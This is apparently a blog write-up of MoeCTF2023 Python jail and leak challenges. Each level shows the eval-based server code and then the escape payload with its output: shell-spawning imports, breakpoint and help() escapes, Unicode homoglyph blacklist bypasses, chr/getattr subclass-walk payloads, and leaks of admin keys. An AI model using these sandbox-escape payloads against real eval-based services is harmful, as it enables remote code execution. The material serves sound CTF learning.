MoeCTF2023_Jail

最新推荐文章于 2024-06-21 19:10:13 发布

m0_75094067

最新推荐文章于 2024-06-21 19:10:13 发布

阅读量165

点赞数

分类专栏： MoeCTF2023 文章标签：安全

本文链接：https://blog.csdn.net/m0_75094067/article/details/133807785

版权

MoeCTF2023 专栏收录该内容

7 篇文章 0 订阅

订阅专栏

MoeCTF2023_Jail

Jail Level 0

Source Code

print("Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
user_input_data = input("> ")
print('calc Answer: {}'.format(eval(user_input_data)))

exp

>>> e
Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.
Enter your expression and I will evaluate it for you.
> __import__('os').system('sh')
ls
flag
server.py
cat flag
flag{7667mhPKkpUNu21zjvmy3RA9ZSJ3e5TM}

Jail Level 1

Source Code

print("Welcome to the MoeCTF2023 Jail challenge level1.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
user_input_data = input("> ")
if len(user_input_data)>12:
  print("Oh hacker! Bye~")
  exit(0)
print('calc Answer: {}'.format(eval(user_input_data)))

exp

>>> e
Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.
Enter your expression and I will evaluate it for you.
> breakpoint()
--Return--
> <string>(1)<module>()->None
(Pdb) __import__('os').system('sh')
ls
flag
server.py
cat flag
flag{hYmKR3P74S0BxEnC_V2tQvY9aH22SI8E}

Jail Level 2

Source Code

print("Welcome to the MoeCTF2023 Jail challenge level1.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
user_input_data = input("> ")
if len(user_input_data)>6:
  print("Oh hacker! Bye~")
  exit(0)
print('calc Answer: {}'.format(eval(user_input_data)))

exp

>>> e
Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.
Enter your expression and I will evaluate it for you.
> help()

Welcome to Python 3.10's help utility!

If this is your first time using Python, you should definitely check out
the tutorial on the internet at https://docs.python.org/3.10/tutorial/.

Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules.  To quit this help utility and
return to the interpreter, just type "quit".

To get a list of available modules, keywords, symbols, or topics, type
"modules", "keywords", "symbols", or "topics".  Each module also comes
with a one-line summary of what it does; to list the modules whose name
or summary contain a given string such as "spam", type "modules spam".

help> os
WARNING: terminal is not fully functional
Press RETURN to continue !sh

!sh
sh: 0: can't access tty; job control turned off
$ cat flag
flag{ywztaDtshMFvz7sQxM-U2VdFWqsGkK1u}

Jail Level 3

Source Code

import re
BANLIST = ['breakpoint']
BANLIST_WORDS = '|'.join(f'({WORD})' for WORD in BANLIST)
print("Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
user_input_data = input("> ")
if len(user_input_data)>12:
print("Oh hacker! Bye~")
exit(0)
if re.findall(BANLIST_WORDS, user_input_data, re.I):
raise Exception('Blacklisted word detected! you are hacker!')
print('Answer result: {}'.format(eval(user_input_data)))

exp

字符编码绕过

s = 'breakpoint()'

for i in range(128, 65537):
    tmp = chr(i)
    try:
        res = tmp.encode('idna').decode('utf-8')
        if res in s and len(res) > 0:
            print(f"ascii:{i}  A:{res}  U:{tmp}  payload:{s.replace(res,tmp)}")
    except:
        pass
# ascii:170  A:a  U:ª  payload:breªkpoint()
# ascii:186  A:o  U:º  payload:breakpºint()
# ascii:691  A:r  U:ʳ  payload:bʳeakpoint()
# ascii:8305  A:i  U:ⁱ  payload:breakpoⁱnt()
# ascii:8317  A:(  U:⁽  payload:breakpoint⁽)
# ascii:8318  A:)  U:⁾  payload:breakpoint(⁾
# ascii:8319  A:n  U:ⁿ  payload:breakpoiⁿt()
# ascii:8333  A:(  U:₍  payload:breakpoint₍)
# ascii:8334  A:)  U:₎  payload:breakpoint(₎
# ascii:8464  A:i  U:ℐ  payload:breakpoℐnt()
# ascii:8465  A:i  U:ℑ  payload:breakpoℑnt()
# ascii:8469  A:n  U:ℕ  payload:breakpoiℕt()
# ascii:8473  A:p  U:ℙ  payload:breakℙoint()
# ascii:8475  A:r  U:ℛ  payload:bℛeakpoint()
# ascii:8476  A:r  U:ℜ  payload:bℜeakpoint()
# ascii:8477  A:r  U:ℝ  payload:bℝeakpoint()
# ascii:8490  A:k  U:K  payload:breaKpoint()
# ascii:8492  A:b  U:ℬ  payload:ℬreakpoint()
# ascii:8495  A:e  U:ℯ  payload:brℯakpoint()
# ascii:8496  A:e  U:ℰ  payload:brℰakpoint()
# ascii:8500  A:o  U:ℴ  payload:breakpℴint()
# ascii:8505  A:i  U:ℹ  payload:breakpoℹnt()
# ascii:8519  A:e  U:ⅇ  payload:brⅇakpoint()
# ascii:8520  A:i  U:ⅈ  payload:breakpoⅈnt()
# ascii:8544  A:i  U:Ⅰ  payload:breakpoⅠnt()
# ascii:8560  A:i  U:ⅰ  payload:breakpoⅰnt()
# ascii:9398  A:a  U:Ⓐ  payload:breⒶkpoint()
# ascii:9399  A:b  U:Ⓑ  payload:Ⓑreakpoint()
# ascii:9402  A:e  U:Ⓔ  payload:brⒺakpoint()
# ascii:9406  A:i  U:Ⓘ  payload:breakpoⒾnt()
# ascii:9408  A:k  U:Ⓚ  payload:breaⓀpoint()
# ascii:9411  A:n  U:Ⓝ  payload:breakpoiⓃt()
# ascii:9412  A:o  U:Ⓞ  payload:breakpⓄint()
# ascii:9413  A:p  U:Ⓟ  payload:breakⓅoint()
# ascii:9415  A:r  U:Ⓡ  payload:bⓇeakpoint()
# ascii:9417  A:t  U:Ⓣ  payload:breakpoinⓉ()
# ascii:9424  A:a  U:ⓐ  payload:breⓐkpoint()
# ascii:9425  A:b  U:ⓑ  payload:ⓑreakpoint()
# ascii:9428  A:e  U:ⓔ  payload:brⓔakpoint()
# ascii:9432  A:i  U:ⓘ  payload:breakpoⓘnt()
# ascii:9434  A:k  U:ⓚ  payload:breaⓚpoint()
# ascii:9437  A:n  U:ⓝ  payload:breakpoiⓝt()
# ascii:9438  A:o  U:ⓞ  payload:breakpⓞint()
# ascii:9439  A:p  U:ⓟ  payload:breakⓟoint()
# ascii:9441  A:r  U:ⓡ  payload:bⓡeakpoint()
# ascii:9443  A:t  U:ⓣ  payload:breakpoinⓣ()
# ascii:13260  A:in  U:㏌  payload:breakpo㏌t()
# ascii:65077  A:(  U:︵  payload:breakpoint︵)
# ascii:65078  A:)  U:︶  payload:breakpoint(︶
# ascii:65113  A:(  U:﹙  payload:breakpoint﹙)
# ascii:65114  A:)  U:﹚  payload:breakpoint(﹚
# ascii:65288  A:(  U:（  payload:breakpoint（)
# ascii:65289  A:)  U:）  payload:breakpoint(）
# ascii:65313  A:a  U:Ａ  payload:breＡkpoint()
# ascii:65314  A:b  U:Ｂ  payload:Ｂreakpoint()
# ascii:65317  A:e  U:Ｅ  payload:brＥakpoint()
# ascii:65321  A:i  U:Ｉ  payload:breakpoＩnt()
# ascii:65323  A:k  U:Ｋ  payload:breaＫpoint()
# ascii:65326  A:n  U:Ｎ  payload:breakpoiＮt()
# ascii:65327  A:o  U:Ｏ  payload:breakpＯint()
# ascii:65328  A:p  U:Ｐ  payload:breakＰoint()
# ascii:65330  A:r  U:Ｒ  payload:bＲeakpoint()
# ascii:65332  A:t  U:Ｔ  payload:breakpoinＴ()
# ascii:65345  A:a  U:ａ  payload:breａkpoint()
# ascii:65346  A:b  U:ｂ  payload:ｂreakpoint()
# ascii:65349  A:e  U:ｅ  payload:brｅakpoint()
# ascii:65353  A:i  U:ｉ  payload:breakpoｉnt()
# ascii:65355  A:k  U:ｋ  payload:breaｋpoint()
# ascii:65358  A:n  U:ｎ  payload:breakpoiｎt()
# ascii:65359  A:o  U:ｏ  payload:breakpｏint()
# ascii:65360  A:p  U:ｐ  payload:breakｐoint()
# ascii:65362  A:r  U:ｒ  payload:bｒeakpoint()
# ascii:65364  A:t  U:ｔ  payload:breakpoinｔ()

>>> e
Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.
Enter your expression and I will evaluate it for you.
> breakpoinｔ()
--Return--
> <string>(1)<module>()->None
(Pdb) __import__('os').system('sh')
cat flag
flag{Vg03aw9uswciSrMEbSuhsW7hyef89_k2}

Jail Level 4

Welcome to the MoeCTF2023 Jail challenge.This is a repeater and it repeats what you say!
python verison:2.7
> __import__('os').system('sh')
sh: 0: can't access tty; job control turned off
$ cat flag
flag{cAWccu_EE6gKWg1XWHB7uDTQY70IJWv2}

Jail Level 5

Source Code

print("Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.")
print("Enter your expression and I will evaluate it for you.")
def func_filter(s):
  not_allowed = set('"'`bid')
  return any(c in not_allowed for c in s)
user_input_data = input("> ")
if func_filter(user_input_data):
  print("Oh hacker! Bye~")
  exit(0)
if not user_input_data.isascii():
  print("Sorry we only ascii for this chall!")
  exit(0)
print('Answer result: {}'.format(eval(user_input_data)))

exp

构造：().class.base.subclasses()[-4].init.globals’system’

利用getattr(),chr()绕过：getattr(getattr(getattr(getattr(().class, chr(95)+chr(95)+chr(98)+chr(97)+chr(115)+chr(101)+chr(95)+chr(95)), chr(95)+chr(95)+chr(115)+chr(117)+chr(98)+chr(99)+chr(108)+chr(97)+chr(115)+chr(115)+chr(101)+chr(115)+chr(95)+chr(95))()[-4], chr(95)+chr(95)+chr(105)+chr(110)+chr(105)+chr(116)+chr(95)+chr(95)), chr(95)+chr(95)+chr(103)+chr(108)+chr(111)+chr(98)+chr(97)+chr(108)+chr(115)+chr(95)+chr(95))chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)

>>> e
Welcome to the MoeCTF2023 Jail challenge.It's time to work on this calc challenge.
Enter your expression and I will evaluate it for you.
> getattr(getattr(getattr(getattr(().__class__, chr(95)+chr(95)+chr(98)+chr(97)+chr(115)+chr(101)+chr(95)+chr(95)), chr(95)+chr(95)+chr(115)+chr(117)+chr(98)+chr(99)+chr(108)+chr(97)+chr(115)+chr(115)+chr(101)+chr(115)+chr(95)+chr(95))()[-4], chr(95)+chr(95)+chr(105)+chr(110)+chr(105)+chr(116)+chr(95)+chr(95)), chr(95)+chr(95)+chr(103)+chr(108)+chr(111)+chr(98)+chr(97)+chr(108)+chr(115)+chr(95)+chr(95))[chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)](chr(115)+chr(104))
ls
flag_9af31874439b2aad
server.py
cat flag_9af31874439b2aad
moectf{GsFYUbxaK8VNeW6ohhIn1N42EnqKv7PQ}

Leak Level 0

Source Code

fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"
print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")
print("| Options:
|       [V]uln
|       [B]ackdoor")
def func_filter(s):
  not_allowed = set('vvvveeee')
  return any(c in not_allowed for c in s)
while(1):
  challenge_choice = input(">>> ").lower().strip()
  if challenge_choice == 'v':
    code = input("code >> ")
    if(len(code)>9):
      print("you're hacker!")
      exit(0)
    if func_filter(code):
      print("Oh hacker! byte~")
      exit(0)
    print(eval(code))
  elif challenge_choice == 'b':
    print("Please enter the admin key")
    key = input("key >> ")
    if(key == fake_key_into_local_but_valid_key_into_remote):
      print("Hey Admin,please input your code:")
      code = input("backdoor >> ")
      print(eval(code))
  else:
    print("You should select valid choice!")

exp

>>> e
Hey Guys,Welcome to the moeleak challenge.Have fun!.
| Options:
|       [V]uln
|       [B]ackdoor
>>> v
you need to
code >> globals()
{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7fc2f593cac0>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': '/home/ctf/./server.py', '__cached__': None, 'key_6366a131649a4e9b': '4e86eda06366a131649a4e9be1a9f217', 'WELCOME': "\n  __  __  ___       _      ______        _  __  _                _  ___  \n |  \\/  |/ _ \\     | |    |  ____| ____ | |/ / | |              | |/ _ \\ \n | \\  / | | | | ___| |    | |__   / __ \\| ' /  | | _____   _____| | | | |\n | |\\/| | | | |/ _ \\ |    |  __| / / _` |  <   | |/ _ \\ \\ / / _ \\ | | | |\n | |  | | |_| |  __/ |____| |___| | (_| | . \\  | |  __/\\ V /  __/ | |_| |\n |_|  |_|\\___/ \\___|______|______\\ \\__,_|_|\\_\\ |_|\\___| \\_/ \\___|_|\\___/ \n                                  \\____/                                 \n
                                                             \n", 'CHALLENGE_SOURCE_CODE': '\n    fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"\n    print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")\n    print("| Options: \n|\t[V]uln \n|\t[B]ackdoor")\n    def func_filter(s):\n      not_allowed = set(\'vvvveeee\')\n      return any(c in not_allowed for c in s)\n    while(1):\n      challenge_choice = input(">>> ").lower().strip()\n      if challenge_choice == \'v\':\n        code = input("code >> ")\n        if(len(code)>9):\n          print("you\'re hacker!")\n          exit(0)\n        if func_filter(code):\n          print("Oh hacker! byte~")\n          exit(0)\n        print(eval(code))\n      elif challenge_choice == \'b\':\n        print("Please enter the admin key")\n        key = input("key >> ")\n        if(key == fake_key_into_local_but_valid_key_into_remote):\n          print("Hey Admin,please input your code:")\n          code = input("backdoor >> ")\n          print(eval(code))\n      else:\n        print("You should select valid choice!")\n', 'choice': 'e', 'func_filter': <function func_filter at 0x7fc2f599e0e0>, 'challenge_choice': 'v', 'code': 'globals()'}
>>> b
Please enter the admin key
key >> 4e86eda06366a131649a4e9be1a9f217
Hey Admin,please input your code:
backdoor> __import__('os').system('sh')
cat flag
flag{E1iKuuMPXcNIYBamRpTdbCqmMeEHp8ud}

Leak Level 1

Source Code

fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"
print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")
def func_filter(s):
  not_allowed = set('moe_dbt')
  return any(c in not_allowed for c in s)
print("| Options:
|       [V]uln
|       [B]ackdoor")
while(1):
  challenge_choice = input(">>> ").lower().strip()
  if challenge_choice == 'v':
    code = input("code >> ")
    if(len(code)>6):
      print("you're hacker!")
      exit(0)
    if func_filter(code):
      print("Oh hacker! byte~")
      exit(0)
    print(eval(code))
  elif challenge_choice == 'b':
    print("Please enter the admin key")
    key = input("key >> ")
    if(key == fake_key_into_local_but_vailed_key_into_remote):
      print("Hey Admin,please input your code:")
      code = input("backdoor >> ")
      print(eval(code))
  else:
    print("You should select valid choice!")

exp

>>> e
Hey Guys,Welcome to the moeleak challenge.Have fun!.
| Options:
|       [V]uln
|       [B]ackdoor
>>> v
you need to
code >> vars()
{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7feb7a85cac0>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': '/home/ctf/./server.py', '__cached__': None, 'key_ff8457ee50ed8d0f': '8d3d451fff8457ee50ed8d0f24881eac', 'WELCOME': "\n  __  __  ___       _      ______        _  __  _                _ __ \n |  \\/  |/ _ \\     | |    |  ____| ____ | |/ / | |              | /_ |\n | \\  / | | | | ___| |    | |__   / __ \\| ' /  | | _____   _____| || |\n | |\\/| | | | |/ _ \\ |    |  __| / / _` |  <   | |/ _ \\ \\ / / _ \\ || |\n | |  | | |_| |  __/ |____| |___| | (_| | . \\  | |  __/\\ V /  __/ || |\n |_|  |_|\\___/ \\___|______|______\\ \\__,_|_|\\_\\ |_|\\___| \\_/ \\___|_||_|\n                                  \\____/
            \n
                                       \n", 'CHALLENGE_SOURCE_CODE': '\n    fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"\n    print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")\n    def func_filter(s):\n      not_allowed = set(\'moe_dbt\')\n      return any(c in not_allowed for c in s)\n    print("| Options: \n|\t[V]uln \n|\t[B]ackdoor")\n    while(1):\n      challenge_choice = input(">>> ").lower().strip()\n      if challenge_choice == \'v\':\n        code = input("code >> ")\n        if(len(code)>6):\n          print("you\'re hacker!")\n          exit(0)\n        if func_filter(code):\n          print("Oh hacker! byte~")\n          exit(0)\n        print(eval(code))\n      elif challenge_choice == \'b\':\n        print("Please enter the admin key")\n        key = input("key >> ")\n        if(key == fake_key_into_local_but_vailed_key_into_remote):\n          print("Hey Admin,please input your code:")\n          code = input("backdoor >> ")\n          print(eval(code))\n      else:\n        print("You should select valid choice!")\n', 'choice': 'e', 'func_filter': <function func_filter at 0x7feb7a8be0e0>, 'challenge_choice': 'v', 'code': 'vars()'}
>>> b
Please enter the admin key
key >> 8d3d451fff8457ee50ed8d0f24881eac
Hey Admin,please input your code:
backdoor> __import__('os').system('sh')
cat flag
flag{tg2GYrhoUnsx6A_Na6qXnk3I4s0cibWH}

Leak Level 2

Source Code

  fake_key_into_local_but_valid_key_into_remote = "moectfisbestctfhopeyoulikethat"
    print("Hey Guys,Welcome to the moeleak challenge.Have fun!.")
    print("| Options:
|       [V]uln
|       [B]ackdoor")
    def func_filter(s):
      not_allowed = set('dbtaaaaaaaaa!')
      return any(c in not_allowed for c in s)
    while(1):
      challenge_choice = input(">>> ").lower().strip()
      if challenge_choice == 'v':
        print("you need to ")
        code = input("code >> ")
        if(len(code)>6):
          print("you're hacker!")
          exit(0)
        if func_filter(code):
          print("Oh hacker! byte~")
          exit(0)
        if not code.isascii():
          print("please use ascii only thanks!")
          exit(0)
        print(eval(code))
      elif challenge_choice == 'b':
        print("Please enter the admin key")
        key = input("key >> ")
        if(key == fake_key_into_local_but_vailed_key_into_remote):
          print("Hey Admin,please input your code:")
          code = input("backdoor> ")
          print(eval(code))
      else:
        print("You should select valid choice!")

exp

>>> e
Hey Guys,Welcome to the moeleak challenge.Have fun!.
| Options:
|       [V]uln
|       [B]ackdoor
>>> v
you need to
code >> help()

Welcome to Python 3.10's help utility!

If this is your first time using Python, you should definitely check out
the tutorial on the internet at https://docs.python.org/3.10/tutorial/.

Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules.  To quit this help utility and
return to the interpreter, just type "quit".

To get a list of available modules, keywords, symbols, or topics, type
"modules", "keywords", "symbols", or "topics".  Each module also comes
with a one-line summary of what it does; to list the modules whose name
or summary contain a given string such as "spam", type "modules spam".

help> __main__
Help on module __main__:

NAME
    __main__

FUNCTIONS
    func_filter(s)

DATA
    CHALLENGE_SOURCE_CODE = '\n    fake_key_into_local_but_valid_key_into_...
    WELCOME = '\n  __  __  ___       _      ______        _  __ ...       ...
    __annotations__ = {}
    challenge_choice = 'v'
    choice = 'e'
    code = 'help()'
    key_f5ee1754b2e73acf = '43610e2ef5ee1754b2e73acf35348dd5'

FILE
    /home/ctf/server.py
>>> b
Please enter the admin key
key >> 43610e2ef5ee1754b2e73acf35348dd5
Hey Admin,please input your code:
backdoor> __import__('os').system('sh')
cat flag
flag{bDLQw0_0cwm9Ef63vWy3rIQiy2xpM5uh}